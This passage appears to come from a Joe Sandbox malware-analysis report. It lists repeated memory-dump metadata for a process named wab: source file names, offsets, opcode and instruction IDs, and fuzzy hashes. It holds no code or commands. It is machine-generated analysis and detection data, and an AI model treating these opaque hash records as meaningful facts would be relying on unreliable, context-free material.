                                                • Instruction Fuzzy Hash: 6EC19D74E01218CFEB14DFA5C994B9DBBB2BF89301F1080AAD809AB355DB359E85DF50
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e37530b376aa10f1878141595af792414f281862916baa9e86ca08bfcaabff06
                                                • Instruction ID: 8ea93ca44a1432d59b1e4031b16d97cbff05aca1d31304195ab1f313b835ab99
                                                • Opcode Fuzzy Hash: e37530b376aa10f1878141595af792414f281862916baa9e86ca08bfcaabff06
                                                • Instruction Fuzzy Hash: 2CC1AE74E01218CFEB14DFA5C994B9DBBB2BF89300F1081AAD809AB355DB359E85DF50
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a728d23d51c45d1b4ccb55aefe6f4e97a57ff9a2f429478c1a9f3f4ef884f58
                                                • Instruction ID: bb9e5e95d76c23d3c35d0fa22e0b15331d1e6bb1e5b39b8b2d95432c032d1401
                                                • Opcode Fuzzy Hash: 4a728d23d51c45d1b4ccb55aefe6f4e97a57ff9a2f429478c1a9f3f4ef884f58
                                                • Instruction Fuzzy Hash: 59C19F74E01218CFEB14DFA5C994B9DBBB2BF89300F1080A9D809AB355DB359E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9198dd79913c90e32e29b6b8a69afe195f117029691bc3366d1720f8c5a18123
                                                • Instruction ID: e45820fde338ac414598304174191466ff40e0cbc36b0e2e9581796bd3e556a8
                                                • Opcode Fuzzy Hash: 9198dd79913c90e32e29b6b8a69afe195f117029691bc3366d1720f8c5a18123
                                                • Instruction Fuzzy Hash: BBC1AE74E01218CFEB14DFA5C984B9DBBB2BF89300F1080AAD809AB355DB359E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 90ae83e350165fe84d183c9621f9fc032df1d4e0020f7c82f3921413f82f7d48
                                                • Instruction ID: 843a4ff03b9dba80ef45072958340a86bcab680fa31c74a15f91620bafd1d6f9
                                                • Opcode Fuzzy Hash: 90ae83e350165fe84d183c9621f9fc032df1d4e0020f7c82f3921413f82f7d48
                                                • Instruction Fuzzy Hash: 44C1AF74E01218CFDB14DFA5C994B9DBBB2BF89300F1080AAD809AB355DB359E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b05eb451b577d5f3e691eebfaf7ea26b9b6f06bebacad3e6eff7b258556c221
                                                • Instruction ID: c80ff839e2a665c8f0f824601b89de082452694c7f6a2252ecae84b8d626f835
                                                • Opcode Fuzzy Hash: 5b05eb451b577d5f3e691eebfaf7ea26b9b6f06bebacad3e6eff7b258556c221
                                                • Instruction Fuzzy Hash: FFC1AE74E01218CFEB14DFA5C994B9DBBB2BB89300F2081A9D809AB355DB359E85DF50
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d3acceca35a79693b0c3b9ac9a4ae2c124413dd10037def4b679682affbf6f6c
                                                • Instruction ID: 0ae1f352643e3dddf8ecce78b24637ad14108119efc93af218d339a617965ed2
                                                • Opcode Fuzzy Hash: d3acceca35a79693b0c3b9ac9a4ae2c124413dd10037def4b679682affbf6f6c
                                                • Instruction Fuzzy Hash: CAC19E74E01218CFEB14DFA5C994B9DBBB2BF89300F1080AAD809AB355DB359E85DF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7e7d90b0b27003b0a642fe322f114fac45553ca610d416af9880c6a5841f4f5e
                                                • Instruction ID: 04b9de09495cf071957f1e717ddd2acc3a4208258bbb537a9a78e9f0253875bf
                                                • Opcode Fuzzy Hash: 7e7d90b0b27003b0a642fe322f114fac45553ca610d416af9880c6a5841f4f5e
                                                • Instruction Fuzzy Hash: 20C1AE74E01218CFEB14DFA5C994B9DBBB2BF89300F1080AAD809AB355DB359E85DF50
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8fd135f702c2590d14612169c73be7bb3b8baf484ecf65b203b9450d00ef3462
                                                • Instruction ID: 915dcf77ae85a08ba70b92753e60306126a1d195b980bf7035fa4b4b64419d9c
                                                • Opcode Fuzzy Hash: 8fd135f702c2590d14612169c73be7bb3b8baf484ecf65b203b9450d00ef3462
                                                • Instruction Fuzzy Hash: 2AC1AF74E01218CFDB14DFA5C984B9DBBB2BF89301F2080AAD809AB355DB359E85DF50
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 14fe39ceac573eca556ff166eabd2fe84ecea815b29e9940d264c631cdaac4a2
                                                • Instruction ID: be2625ab9c1d52a4036e3ba369a6c346540eae07ec0d844dc92d144fd557793f
                                                • Opcode Fuzzy Hash: 14fe39ceac573eca556ff166eabd2fe84ecea815b29e9940d264c631cdaac4a2
                                                • Instruction Fuzzy Hash: 89C1AD74E01218CFEB14DFA5C994B9DBBB2AB89300F2081A9D809AB355DB359E85DF50
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f55788e1eaccd8a9634b4ca5bdb11b683966616226743c17249d283fbb076aed
                                                • Instruction ID: e920dcaab1d51ee6cc05ace6588bf73d3a535f60f76eba96858ea3eb8c3ad2f9
                                                • Opcode Fuzzy Hash: f55788e1eaccd8a9634b4ca5bdb11b683966616226743c17249d283fbb076aed
                                                • Instruction Fuzzy Hash: 00C19E74E01218CFEB14DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E85DF50
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 98b436f0cf16c0eeaaaed2eeee786ae8f40c0fb5c785503e6148a91acfb30df9
                                                • Instruction ID: 6617cb32ac65e2a03906af9b51f8628c4539658ca6e2803e4ad077b300b64551
                                                • Opcode Fuzzy Hash: 98b436f0cf16c0eeaaaed2eeee786ae8f40c0fb5c785503e6148a91acfb30df9
                                                • Instruction Fuzzy Hash: 9CC18E74E01318CFEB14DFA5C994B9DBBB2BB89300F1081A9D809AB355DB359E85CF51
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 29b29477140dc55ac9b84f4663ff66dac2b19d7659d807bb430eae46ec796f98
                                                • Instruction ID: 6da0d99dfd94cb083de16d1f704a8754e3dd47e8f44ad289d442d085bccab28a
                                                • Opcode Fuzzy Hash: 29b29477140dc55ac9b84f4663ff66dac2b19d7659d807bb430eae46ec796f98
                                                • Instruction Fuzzy Hash: CAB1AF74E01318CFDB54DFA4C984B9DBBB2BB89300F2080AAD809A7355DB35AE85DF50
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 406fd6d4ee6b8234cb0ea9ac6a45118401c534d3b4597ca69207b4917a8b7341
                                                • Instruction ID: f6c71b3093eb9b123f726df81ca0cfa067a252c6fa20d07f9ede3f7068e32244
                                                • Opcode Fuzzy Hash: 406fd6d4ee6b8234cb0ea9ac6a45118401c534d3b4597ca69207b4917a8b7341
                                                • Instruction Fuzzy Hash: 5B515A74D00208CBEB08DFA9C9447EDBBB2FF88304F10C125D414AB694D7799985CF98
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2656187498.0000000027780000.00000040.00000800.00020000.00000000.sdmp, Offset: 27780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_27780000_wab.jbxd